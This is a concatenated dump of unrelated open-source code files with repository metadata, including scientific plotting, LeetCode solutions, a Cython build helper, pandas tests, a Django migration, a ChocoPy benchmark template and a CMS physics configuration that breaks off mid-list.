    print('-------------------------------------')
    # loading datasets
    print('Splitting function: %s' % split)
    tasks, all_dataset, transformers = loading_functions[dataset](
        featurizer=featurizer, split=split, K=K)

    if cross_valid:
      num_iter = K  # K iterations for cross validation
    else:
      num_iter = 1
    for count_iter in range(num_iter):
      # Assembling train and valid datasets: fold K-count_iter-1 is held
      # out for validation, the remaining K-1 folds form the training set.
      train_folds = all_dataset[:K - count_iter - 1] + all_dataset[K -
                                                                   count_iter:]
      train_dataset = deepchem.splits.merge_fold_datasets(train_folds)
      valid_dataset = all_dataset[K - count_iter - 1]

      time_start_fitting = time.time()
      train_score = {}
      valid_score = {}

      if isinstance(model, str):
        if mode == 'classification':
          valid_score = low_data_benchmark_classification(
              train_dataset,
              valid_dataset,
              n_features,
              metric,
              model=model,
              hyper_parameters=hyper_parameters,
              seed=seed)
      else:
        # User-defined model object: fit and evaluate directly.
        model.fit(train_dataset)
        valid_score['user_defined'] = model.evaluate(valid_dataset, metric,
                                                     transformers)
      time_finish_fitting = time.time()

      # Append one CSV row per scored model with per-task scores and the
      # wall-clock fitting time.
      with open(os.path.join(out_path, 'results.csv'), 'a') as f:
        writer = csv.writer(f)
        for i in valid_score:
          output_line = [dataset, str(split), mode, 'valid', i]
          for task in valid_score[i][0]:
            output_line.extend(
                [task, valid_score[i][0][task], valid_score[i][1][task]])
          output_line.extend(
              ['time_for_running', time_finish_fitting - time_start_fitting])
          writer.writerow(output_line)
| [
"zqwu@stanford.edu"
] | zqwu@stanford.edu |
1ee5d551c1a0a33fe0978fbc6df59855ac744636 | ded0c895f6e1f8853f2222ae498bdc7ae52ef0e4 | /week-06/rise-time_resistenza.py | 1c1a0eb0e395c940b322ecaea9ffa6fd256801de | [] | no_license | LorenzoLMP/TD2015 | 6a8846b4592b32db81338b8522a10a2dc52531c1 | e39b51d48149d07c3cea682a02eeec4e69ffbabd | refs/heads/master | 2021-01-17T14:47:20.378339 | 2016-05-31T11:33:50 | 2016-05-31T11:33:50 | 43,302,288 | 0 | 0 | null | 2015-09-28T13:58:46 | 2015-09-28T13:23:45 | null | UTF-8 | Python | false | false | 1,077 | py | from pylab import *
from scipy import *
from scipy import optimize
from scipy import misc
#data = genfromtxt('es4_flash_mod')
#data1 = genfromtxt('es4_signal50hz_def1')
#xdata = [1, 10, 98.2, 654, 2200, 14.8, 32.6, 67.1, 46.1]#kOhm
# Measured data: resistance [kOhm] and the corresponding rise time [us].
xdata = [1, 10, 14.8, 32.6, 46.1, 67.1, 98.2, 654, 2200]
ydata = [15, 34, 44, 88, 120, 190, 256, 176, 92]
# Resistance uncertainties, listed in the original (unsorted) acquisition
# order; sorted so they line up with the ascending xdata above.
sigmax = [0.008, 0.08, 0.98, 6.54, 22, 0.148, 0.326, 0.671, 0.461]
sigmax.sort()
# Constant 4 us uncertainty on every rise-time measurement.
sigmay = [4] * len(ydata)
# Plot the data with error bars (titles/labels kept in Italian).
grid('on', which = "both")
title(r"Andamento del rise-time $[\mu s]$ in funzione di R $[k\Omega]$", size = 15)
plot(xdata, ydata, '--', color="black")
errorbar(xdata, ydata, sigmay, sigmax, linestyle="None" , marker=".", color="red", markersize= 10)
xlim(0,120)
xlabel(r'Resistenza $[k\Omega]$')
# Bug fix: the y-axis label was garbled (r's $[\mu]$s' rendered as "s [µ]s").
ylabel(r'rise-time $[\mu s]$')
rc('font', size=15)
savefig('rise_time_1-100', dpi=400)
show()
| [
"lorenzo.perrone.lmp@gmail.com"
] | lorenzo.perrone.lmp@gmail.com |
1bdb45ae6c22c3c4ce32fcf8b377085dde619b34 | b78ef082335b0a901b3f028746055fc6308990a2 | /Algorithms/Leetcode/904 - Fruit Into Baskets.py | 9d9164a2cca2a82732629e128b6bedd9c261103f | [] | no_license | timpark0807/self-taught-swe | 1a968eab63f73cea30ef2379ffab53980743ed1a | bbfee57ae89d23cd4f4132fbb62d8931ea654a0e | refs/heads/master | 2021-08-14T23:31:14.409480 | 2021-08-10T06:36:06 | 2021-08-10T06:36:06 | 192,797,733 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | import collections
class Solution(object):
    def totalFruit(self, tree):
        """LeetCode 904: length of the longest contiguous run of ``tree``
        containing at most two distinct values (fruit types).

        :type tree: List[int]
        :rtype: int
        """
        basket = collections.defaultdict(int)
        best = 0
        window_start = 0
        for window_end, fruit in enumerate(tree):
            basket[fruit] += 1
            # Shrink from the left until at most two fruit types remain.
            while len(basket) > 2:
                departing = tree[window_start]
                basket[departing] -= 1
                if basket[departing] == 0:
                    del basket[departing]
                window_start += 1
            best = max(best, window_end - window_start + 1)
        return best
| [
"timpark0807@gmail.com"
] | timpark0807@gmail.com |
5a27886f080eaee5bc8cd830fd82568adc821010 | c0f022b3ff454435c3cda9dea25fae9f2765ddeb | /build_helpers.py | 903445e3ed32be514efec90ac18553c42ff92115 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | fos/fos | fabe3786f4963803f6e1285dd102c5d81b534e66 | 8d33bf0cd60292ad5164973b5285122acbc03b86 | refs/heads/master | 2016-09-06T12:52:45.011875 | 2014-11-11T09:19:38 | 2014-11-11T09:19:38 | 2,089,645 | 5 | 0 | null | 2014-11-11T09:19:39 | 2011-07-22T16:57:14 | Python | UTF-8 | Python | false | false | 2,424 | py | ''' Module to automate cython building '''
import os
from os.path import join as pjoin
from distutils.extension import Extension
def make_cython_ext(modulename,
                    has_cython,
                    include_dirs=None,
                    extra_c_sources=None):
    ''' Create Cython extension builder from module names

    Returns extension for building and command class depending on
    whether you want to use Cython and ``.pyx`` files for building
    (`has_cython` == True) or the Cython-generated C files (`has_cython`
    == False).

    Assumes ``pyx`` or C file has the same path as that implied by
    modulename.

    Parameters
    ----------
    modulename : string
        module name, relative to setup.py path, with python dot
        separators, e.g mypkg.mysubpkg.mymodule
    has_cython : bool
        True if we have cython, False otherwise
    include_dirs : None or sequence
        include directories
    extra_c_sources : None or sequence
        sequence of strings giving extra C source files

    Returns
    -------
    ext : extension object
    cmdclass : dict
        command class dictionary for setup.py

    Examples
    --------
    You will need Cython on your python path to run these tests.

    >>> modulename = 'pkg.subpkg.mymodule'
    >>> ext, cmdclass = make_cython_ext(modulename, True, None,['test.c'])
    >>> ext.name == modulename
    True
    >>> pyx_src = os.path.join('pkg', 'subpkg', 'mymodule.pyx')
    >>> ext.sources == [pyx_src, 'test.c']
    True
    >>> import Cython.Distutils
    >>> cmdclass['build_ext'] == Cython.Distutils.build_ext
    True
    >>> ext, cmdclass = make_cython_ext(modulename, False, None, ['test.c'])
    >>> ext.name == modulename
    True
    >>> pyx_src = os.path.join('pkg', 'subpkg', 'mymodule.c')
    >>> ext.sources == [pyx_src, 'test.c']
    True
    >>> cmdclass
    {}
    '''
    # Normalise the optional sequence arguments.
    include_dirs = [] if include_dirs is None else include_dirs
    extra_c_sources = [] if extra_c_sources is None else extra_c_sources
    # Build from the .pyx source when Cython is available, otherwise from
    # the pre-generated C file at the same dotted path.
    src_ext = '.pyx' if has_cython else '.c'
    source_path = pjoin(*modulename.split('.')) + src_ext
    ext = Extension(modulename, [source_path] + extra_c_sources,
                    include_dirs=include_dirs)
    if has_cython:
        from Cython.Distutils import build_ext
        cmdclass = {'build_ext': build_ext}
    else:
        cmdclass = {}
    return ext, cmdclass
| [
"garyfallidis@gmail.com"
] | garyfallidis@gmail.com |
e0c920b31fbc64e0f25a96b63931c0d7f99a10aa | dd15e2332d3e981203855b2d9d0eb723f5707410 | /triton/dns/dnssec/algorithms/__init__.py | dedbedf897c4fb434e1e9fac27f8796400fb21e0 | [
"MIT"
] | permissive | Yurzs/triton | db63540c1fdce1b11a33a4ef7f7e7a5f1498ac24 | b64424c193b131721f172f94963d8d79b21804db | refs/heads/master | 2021-07-22T20:28:11.750946 | 2019-10-13T21:47:09 | 2019-10-13T21:47:09 | 209,257,735 | 0 | 1 | MIT | 2020-11-02T14:21:54 | 2019-09-18T08:28:29 | Python | UTF-8 | Python | false | false | 185 | py | from .base import Algorithm
from .ecc import ECDSAP256SHA256, ECCGOST, ECDSAP384SHA384
from .ed import ED448, ED25519
from .rsa import RSASHA256, RSASHA1, RSASHA512, RSASHA1_NSEC3_SHA1
| [
"yurzs@icloud.com"
] | yurzs@icloud.com |
37abc4e7c8314aa9f8914a2906228494a1e1c5fc | 7c5dbe7a2df9fce39a1658c5e2b7ba9a90a9b5f7 | /长佩/wordcount.py | c14b376fbfaef2995c9350e552fc635d6be92b1c | [] | no_license | ydPro-G/Python_spiders | 9566431129cd7f8b2fabc68660111426384bfd69 | c37472c3789ce444180ee1c218f287ce3c032d50 | refs/heads/master | 2023-02-23T20:39:31.279762 | 2021-01-27T05:50:40 | 2021-01-27T05:50:40 | 289,230,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,585 | py | import re
import collections
import numpy as np
import jieba
import wordcloud
from PIL import Image
import matplotlib.pyplot as plt
# Read the raw corpus; a ``with`` block guarantees the GBK-encoded file
# is closed even if reading fails (the original used manual open/close).
with open('CP.txt', encoding='gbk') as fn:
    string_data = fn.read()
# --- Text preprocessing: strip punctuation and layout characters ---
pattern = re.compile(u'\t|\n|\.|-|:|;|\)|\(|\?|"')  # characters to drop
string_data = re.sub(pattern, '', string_data)
# --- Tokenisation (jieba, accurate mode) ---
seg_list_exact = jieba.cut(string_data, cut_all=False)
# Stop-word set: common Chinese function words and punctuation.  A set
# makes the per-token membership test O(1) instead of O(n) on a list.
remove_words = {u'的', u',', u'和', u'是', u'随着', u'对于', u'对', u'等', u'能', u'都', u'。', u' ', u'、', u'中', u'在', u'了',
                u'通常', u'如果', u'我们', u'需要'}
object_list = [word for word in seg_list_exact if word not in remove_words]
# --- Word-frequency statistics ---
word_counts = collections.Counter(object_list)
word_counts_top10 = word_counts.most_common(10)  # ten most frequent tokens
print(word_counts_top10)  # sanity check
# --- Word-cloud rendering ---
mask = np.array(Image.open('wordcloud.jpg'))  # shape/colour image for the cloud
wc = wordcloud.WordCloud(
    font_path='C:/Windows/Fonts/simhei.ttf',  # a font containing CJK glyphs
    mask=mask,
    max_words=200,
    max_font_size=100,
    background_color='white'
)
wc.generate_from_frequencies(word_counts)  # build the cloud from the counts
image_colors = wordcloud.ImageColorGenerator(mask)  # palette from the mask image
wc.recolor(color_func=image_colors)  # recolour the cloud to match the mask
plt.imshow(wc)
plt.axis('off')
plt.show() # 显示图像 | [
"46178109+ydPro-G@users.noreply.github.com"
] | 46178109+ydPro-G@users.noreply.github.com |
3d0ad7fa61f71c0e7835ba9dcaf7f29ab2b35392 | d308fffe3db53b034132fb1ea6242a509f966630 | /pirates/piratesgui/RadarObjDef.py | e93baad8c0f3ebf9a28b6f4f2cce0a4f4849e296 | [
"BSD-3-Clause"
] | permissive | rasheelprogrammer/pirates | 83caac204965b77a1b9c630426588faa01a13391 | 6ca1e7d571c670b0d976f65e608235707b5737e3 | refs/heads/master | 2020-03-18T20:03:28.687123 | 2018-05-28T18:05:25 | 2018-05-28T18:05:25 | 135,193,362 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.piratesgui.RadarObjDef
# Marker categories the radar GUI distinguishes when drawing blips
# (decompiled module; values are part of the wire/display protocol,
# so they must not be renumbered).
RADAR_OBJ_TYPE_DEFAULT = 0
RADAR_OBJ_TYPE_LANDMARK = 1
RADAR_OBJ_TYPE_QUEST = 2
RADAR_OBJ_TYPE_SHIP = 3
RADAR_OBJ_TYPE_EXIT = 4
RADAR_OBJ_TYPE_TUTORIAL = 5
RADAR_OBJ_EXIT_OFFSET_Z = -0.15 | [
"33942724+itsyaboyrocket@users.noreply.github.com"
] | 33942724+itsyaboyrocket@users.noreply.github.com |
b5f49e9874ff2559737ac2b0489f54b6428617d2 | de4f038dd0de465152db16457aa37c8b4e911fb5 | /pandas/tests/indexes/period/test_scalar_compat.py | ac01b4aad81c998687bf92d67b3bbb907b4e22a2 | [
"BSD-3-Clause"
] | permissive | dr-aryone/pandas | 0350c5625fbb854049f086dabdfa198fa6d5929b | ba48fc4a033f11513fa2dd44c946e18b7bc27ad2 | refs/heads/master | 2020-05-27T06:26:23.174532 | 2019-05-25T01:18:04 | 2019-05-25T01:18:04 | 188,521,455 | 1 | 1 | BSD-3-Clause | 2019-05-25T04:42:58 | 2019-05-25T04:42:57 | null | UTF-8 | Python | false | false | 749 | py | """Tests for PeriodIndex behaving like a vectorized Period scalar"""
from pandas import Timedelta, date_range, period_range
import pandas.util.testing as tm
class TestPeriodIndexOps:
    """PeriodIndex should expose Period.start_time/end_time element-wise."""

    def test_start_time(self):
        # Monthly periods begin at midnight on the first day of the month.
        pidx = period_range(freq='M', start='2016-01-01', end='2016-05-31')
        expected = date_range('2016-01-01', end='2016-05-31', freq='MS')
        tm.assert_index_equal(pidx.start_time, expected)

    def test_end_time(self):
        # Monthly periods end one nanosecond before the next month starts,
        # i.e. month-end date + (1 day - 1 ns).
        pidx = period_range(freq='M', start='2016-01-01', end='2016-05-31')
        month_ends = date_range('2016-01-01', end='2016-05-31', freq='M')
        expected = month_ends + (Timedelta(1, 'D') - Timedelta(1, 'ns'))
        tm.assert_index_equal(pidx.end_time, expected)
| [
"jeff@reback.net"
] | jeff@reback.net |
e4b8582a9c46220007caab110d1113d9a128ac69 | 8dca64dd11b23a7d59413ac8e28e92a0ab80c49c | /95. Unique Binary Search Trees II/solution.py | 5880ea8112ddab5737449c11b0348372d774fdf1 | [] | no_license | huangruihaocst/leetcode-python | f854498c0a1d257698e10889531c526299d47e39 | 8f88cae7cc982ab8495e185914b1baeceb294060 | refs/heads/master | 2020-03-21T20:52:17.668477 | 2018-10-08T20:29:35 | 2018-10-08T20:29:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | # Definition for a binary tree node.
class TreeNode:
    # Minimal binary-tree node: integer payload plus left/right children
    # (LeetCode's standard definition).
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
class Solution:
    def generateTrees(self, n):
        """Return the roots of every structurally unique BST on keys 1..n.

        :type n: int
        :rtype: List[TreeNode]
        """
        from functools import lru_cache
        if n == 0:
            return []
        @lru_cache(maxsize=None)
        def build(keys):
            # ``keys`` is always a range object: slicing a range yields a
            # range, and ranges are hashable, so lru_cache can key on them.
            if len(keys) == 0:
                return [None]
            roots = []
            for idx, root_key in enumerate(keys):
                # Any BST rooted at root_key pairs one subtree built from
                # the smaller keys with one built from the larger keys.
                for left_sub in build(keys[:idx]):
                    for right_sub in build(keys[idx + 1:]):
                        node = TreeNode(root_key)
                        node.left = left_sub
                        node.right = right_sub
                        roots.append(node)
            return roots
        return build(range(1, n + 1))
if __name__ == '__main__':
    # Ad-hoc demo: print the (two) unique BSTs holding the keys 1..2.
    s = Solution()
    trees = s.generateTrees(2)
    print(trees)
| [
"huangruihaocst@126.com"
] | huangruihaocst@126.com |
4fe2599a9c4e89e3e13d7841a707586ae6840319 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/exp-big-622.py | 3a2dac4d082b65b880dfe497b0580a46a02d08b9 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,175 | py | # Compute x**y
# Generated ChocoPy benchmark: computes x**y in ``a`` via recursion,
# exercising nested functions and ``nonlocal``; a2..a5 are redundant
# busy-work copies updated alongside ``a``.
def exp(x: int, y: int) -> int:
    a: int = 0
    a2: int = 0
    a3: int = 0
    a4: int = 0
    a5: int = 0
    def f(i: int) -> int:
        nonlocal a
        nonlocal a2
        nonlocal a3
        nonlocal a4
        nonlocal a5
        def geta() -> int:
            return a
        if i <= 0:
            return geta()
        else:
            a = a * x
            a2 = a * x
            a3 = a * x
            a4 = a * x
            a5 = a * x
            return f(i-1)
    a = 1
    a2 = 1
    a3 = 1
    a4 = 1
    a5 = 1
    return f(y)
# Variant of exp() with extra parameters x2/y2 that the body never reads
# (generated signature padding).
def exp2(x: int, y: int, x2: int, y2: int) -> int:
    a: int = 0
    a2: int = 0
    a3: int = 0
    a4: int = 0
    a5: int = 0
    def f(i: int) -> int:
        nonlocal a
        nonlocal a2
        nonlocal a3
        nonlocal a4
        nonlocal a5
        def geta() -> int:
            return a
        if i <= 0:
            return geta()
        else:
            a = a * x
            a2 = a * x
            a3 = a * x
            a4 = a * x
            a5 = a * x
            return f(i-1)
    a = 1
    a2 = 1
    a3 = 1
    a4 = 1
    a5 = 1
    return f(y)
# Like exp(), with unused padding parameters.  NOTE: ``$Exp`` below is a
# template placeholder (this file is a ChocoPy benchmark-generation
# template, not directly runnable Python).
def exp3(x: int, y: int, x2: int, y2: int, x3: int, y3: int) -> int:
    a: int = 0
    a2: int = 0
    a3: int = 0
    a4: int = 0
    a5: int = 0
    def f(i: int) -> int:
        nonlocal a
        nonlocal a2
        nonlocal a3
        nonlocal a4
        nonlocal a5
        def geta() -> int:
            return a
        if $Exp:
            return geta()
        else:
            a = a * x
            a2 = a * x
            a3 = a * x
            a4 = a * x
            a5 = a * x
            return f(i-1)
    a = 1
    a2 = 1
    a3 = 1
    a4 = 1
    a5 = 1
    return f(y)
# Variant of exp() with unused padding parameters x2..y4.
def exp4(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int) -> int:
    a: int = 0
    a2: int = 0
    a3: int = 0
    a4: int = 0
    a5: int = 0
    def f(i: int) -> int:
        nonlocal a
        nonlocal a2
        nonlocal a3
        nonlocal a4
        nonlocal a5
        def geta() -> int:
            return a
        if i <= 0:
            return geta()
        else:
            a = a * x
            a2 = a * x
            a3 = a * x
            a4 = a * x
            a5 = a * x
            return f(i-1)
    a = 1
    a2 = 1
    a3 = 1
    a4 = 1
    a5 = 1
    return f(y)
# Variant of exp() with unused padding parameters x2..y5.
def exp5(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int, x5: int, y5: int) -> int:
    a: int = 0
    a2: int = 0
    a3: int = 0
    a4: int = 0
    a5: int = 0
    def f(i: int) -> int:
        nonlocal a
        nonlocal a2
        nonlocal a3
        nonlocal a4
        nonlocal a5
        def geta() -> int:
            return a
        if i <= 0:
            return geta()
        else:
            a = a * x
            a2 = a * x
            a3 = a * x
            a4 = a * x
            a5 = a * x
            return f(i-1)
    a = 1
    a2 = 1
    a3 = 1
    a4 = 1
    a5 = 1
    return f(y)
# Input parameter
# (n2..n5 and i2..i5 are generated padding; only n and i drive the loop)
n:int = 42
n2:int = 42
n3:int = 42
n4:int = 42
n5:int = 42
# Run [0, n]
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
# Prints 2**(i % 31) for each i in 0..n.
while i <= n:
    print(exp(2, i % 31))
i = i + 1 | [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
3adcb8fc1e79961d293753a37d7cbed5f201f697 | 7a4fc6e37b501a6b79a1fec3e065e63d77d5cad6 | /scripts/gpipe/exons2stats.py | 03dc2cd8cacb1c76fff9f3ebf38e1e7e451da6cf | [
"MIT"
] | permissive | bioCKO/Optic | f7d3d4164d03cff8e6a930d569d899379cb3cacf | 2df92e953b5139ff4e5c383cb4383e6367cd47f1 | refs/heads/master | 2021-05-19T15:11:21.782547 | 2015-09-22T15:46:39 | 2015-09-22T15:46:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,467 | py | ##########################################################################
#
# MRC FGU Computational Genomics Group
#
# $Id$
#
# Copyright (C) 2009 Andreas Heger
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
##########################################################################
'''
gpipe/exons2stats.py -
======================================================
:Author: Andreas Heger
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. todo::
describe purpose of the script.
Usage
-----
Example::
python gpipe/exons2stats.py --help
Type::
python gpipe/exons2stats.py --help
for command line help.
Documentation
-------------
Code
----
'''
import sys
import csv
import pgdb
import CGAT.Experiment as E
import CGAT.Exons as Exons
# Option parser built at module scope; E is CGAT.Experiment.
# NOTE(review): this is Python 2 code (``print`` statement below).
parser = E.OptionParser(
    version="%prog version: $Id: gpipe/exons2stats.py 2781 2009-09-10 11:33:14Z andreas $")
def main(argv=None):
    """script main.
    parses command line options in sys.argv, unless *argv* is given.
    """
    if argv is None:
        argv = sys.argv
    parser.add_option("-q", "--quality", dest="quality", type="string",
                      help="quality categories to take into account.")
    parser.add_option("-f", "--format=", dest="format", type="string",
                      help="input format [exons|gff|table]")
    parser.add_option("-e", "--exons-file=", dest="tablename_exons", type="string",
                      help="table name with exons.")
    parser.add_option("-p", "--predictions=", dest="tablename_predictions", type="string",
                      help="table name with predictions.")
    parser.add_option("-n", "--non-redundant", dest="non_redundant", action="store_true",
                      help="only non-redundant predictions.")
    parser.add_option("-s", "--schema", dest="schema", type="string",
                      help="schema to use.")
    parser.set_defaults(
        fields=["Id", "NumExons", "GeneLength", "MinExonLength",
                "MaxExonLength", "MinIntronLength", "MaxIntronLength"],
        tablename_exons="exons",
        tablename_predictions="predictions",
        quality=None,
        non_redundant=False,
        schema=None,
        tablename_redundant="redundant",
        tablename_quality="quality",
        format="exons",
    )
    (options, args) = E.Start(
        parser, add_csv_options=True, add_database_options=True)
    # -q takes a comma-separated list of quality categories.
    if options.quality:
        options.quality = options.quality.split(",")
    # Exon boundaries come either from a PostgreSQL table ("table" format)
    # or are parsed from stdin.
    if options.format == "table":
        dbhandle = pgdb.connect(options.psql_connection)
        exons = Exons.GetExonBoundariesFromTable(dbhandle,
                                                 options.tablename_predictions,
                                                 options.tablename_exons,
                                                 non_redundant_filter=options.non_redundant,
                                                 quality_filter=options.quality,
                                                 table_name_quality=options.tablename_quality,
                                                 table_name_redundant=options.tablename_redundant,
                                                 schema=options.schema)
    else:
        exons = Exons.ReadExonBoundaries(sys.stdin)
    stats = Exons.CalculateStats(exons)
    # Tab-separated header, then one CSV row per gene id; stat keys that
    # are not listed in ``fields`` are dropped via extrasaction='ignore'.
    print "\t".join(options.fields)
    writer = csv.DictWriter(sys.stdout,
                            options.fields,
                            dialect=options.csv_dialect,
                            lineterminator=options.csv_lineterminator,
                            extrasaction='ignore')
    for k, v in stats.items():
        v["Id"] = k
        writer.writerow(v)
    E.Stop()
if __name__ == "__main__":
    sys.exit(main(sys.argv))
| [
"andreas.heger@gmail.com"
] | andreas.heger@gmail.com |
517bab109d3b890fc212b0e4e817e856b17a8744 | 889d85d5b12d099f3ba5ce0083a828181da9e973 | /2020-08-month-long-challenge/day06.py | 66769c379769d62d8db4f6ca3c7ed84d674f3460 | [
"Unlicense"
] | permissive | jkbockstael/leetcode | def0fca6605e3432b979c145979a3f3de225d870 | 8ef5c907fb153c37dc97f6524493ceca2044ea38 | refs/heads/master | 2021-05-23T08:54:15.313887 | 2020-09-24T20:53:46 | 2020-09-24T20:53:46 | 253,208,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | #!/usr/bin/env python3
# Day 6: Find All Duplicates in an Array
#
# Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array), some elements
# appear twice and others appear once.
# Find all the elements that appear twice in this array.
# Could you do it without extra space and in O(n) runtime?
class Solution:
    def findDuplicates(self, nums: [int]) -> [int]:
        """Return every value that appears twice in ``nums``.

        All values lie in 1..len(nums), so value v maps to slot v - 1.
        Visiting a value negates its slot; finding the slot already
        negative means v was seen before.  Runs in O(n) time with O(1)
        extra space, at the price of leaving ``nums`` partially negated.
        """
        twice = []
        for entry in nums:
            value = abs(entry)      # entry itself may already be negated
            slot = value - 1
            if nums[slot] < 0:      # second encounter of ``value``
                twice.append(value)
            else:                   # first encounter: leave a marker
                nums[slot] = -nums[slot]
        return twice
# Module-level smoke test (runs on import): the example from the
# problem statement.
assert Solution().findDuplicates([4,3,2,7,8,2,3,1]) == [2,3]
| [
"jkb@jkbockstael.be"
] | jkb@jkbockstael.be |
51452deb12793778ae6ebbc8366f2e0842600087 | bad595a92335a51f629c9a4945d68be0a22d21ba | /src/GLC/team/migrations/0005_teamhead.py | d5938a98cfa25b6810293535af6cd8a55b2f2af2 | [] | no_license | Fabricourt/GLC | 21f0afa27b1cbc34c114b4d514b9b8637813ea24 | a1af55972141e2179742e248d6bd12bb154ca95f | refs/heads/master | 2022-12-01T05:43:56.625087 | 2019-07-14T14:33:44 | 2019-07-14T14:33:44 | 185,725,838 | 0 | 0 | null | 2022-11-22T03:48:18 | 2019-05-09T04:24:38 | CSS | UTF-8 | Python | false | false | 989 | py | # Generated by Django 2.2.1 on 2019-05-09 19:27
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated Django migration: introduces the ``Teamhead`` model
    # (header/branding content for the team page).
    dependencies = [
        ('team', '0004_team_team_header'),
    ]
    operations = [
        migrations.CreateModel(
            name='Teamhead',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('team_header', models.ImageField(blank=True, null=True, upload_to='home_header/')),
                ('logo_short_name', models.CharField(blank=True, max_length=20, null=True)),
                ('motivational_statement', models.CharField(blank=True, max_length=20, null=True)),
                # The callable default is evaluated per row at save time,
                # not once at migration time.
                ('reload', models.DateTimeField(default=django.utils.timezone.now)),
                ('is_published', models.BooleanField(default=True)),
            ],
        ),
    ]
| [
"mfalme2030@gmail.com"
] | mfalme2030@gmail.com |
c67fe6238023902f41611968a1a80044d9f015c6 | 2455062787d67535da8be051ac5e361a097cf66f | /Producers/BSUB/TrigProd_amumu_a5_dR5/trigger_amumu_producer_cfg_TrigProd_amumu_a5_dR5_146.py | e91f8bd9936a35e7eda09f0a5bf5d8e8621bf2c6 | [] | no_license | kmtos/BBA-RecoLevel | 6e153c08d5ef579a42800f6c11995ee55eb54846 | 367adaa745fbdb43e875e5ce837c613d288738ab | refs/heads/master | 2021-01-10T08:33:45.509687 | 2015-12-04T09:20:14 | 2015-12-04T09:20:14 | 43,355,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
#process.load("BBA/Analyzer/bbaanalyzer_cfi")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.Geometry.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'MCRUN2_71_V1::All', '')
process.load("Configuration.StandardSequences.MagneticField_cff")
####################
# Message Logger
####################
process.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
## switch to uncheduled mode
process.options.allowUnscheduled = cms.untracked.bool(True)
# NOTE(review): this second assignment overrides the -1 ("all events")
# setting above, so only 500 events are actually processed.
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(500)
)
####################
# Input File List
####################
# Input source
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring('root://eoscms//eos/cms/store/user/ktos/RECO_Step3_amumu_a5/RECO_Step3_amumu_a5_146.root'),
    secondaryFileNames = cms.untracked.vstring()
)
############################################################
# Defining matching in DeltaR, sorting by best DeltaR
############################################################
process.mOniaTrigMatch = cms.EDProducer("PATTriggerMatcherDRLessByR",
    src = cms.InputTag( 'slimmedMuons' ),
    matched = cms.InputTag( 'patTrigger' ), # selections of trigger objects
    matchedCuts = cms.string( 'type( "TriggerMuon" ) && path( "HLT_Mu16_TkMu0_dEta18_Onia*")' ), # input does not yet have the 'saveTags' parameter in HLT
    maxDPtRel = cms.double( 0.5 ), # no effect here
    maxDeltaR = cms.double( 0.3 ), #### selection of matches
    maxDeltaEta = cms.double( 0.2 ), # no effect here
    resolveAmbiguities = cms.bool( True ),# definition of matcher output
    resolveByMatchQuality = cms.bool( True )# definition of matcher output
)
# talk to output module
process.out = cms.OutputModule("PoolOutputModule",
    fileName = cms.untracked.string("file:RECO_Step3_amumu_a5_TrigProd_146.root"),
    outputCommands = process.MINIAODSIMEventContent.outputCommands
)
# Start from the MINIAODSIM content, then drop everything and keep only
# the listed products (slimmed collections, taus, trigger info, matches).
process.out.outputCommands += [ 'drop *_*_*_*',
                                'keep *_*slimmed*_*_*',
                                'keep *_pfTausEI_*_*',
                                'keep *_hpsPFTauProducer_*_*',
                                'keep *_hltTriggerSummaryAOD_*_*',
                                'keep *_TriggerResults_*_HLT',
                                'keep *_patTrigger*_*_*',
                                'keep *_prunedGenParticles_*_*',
                                'keep *_mOniaTrigMatch_*_*'
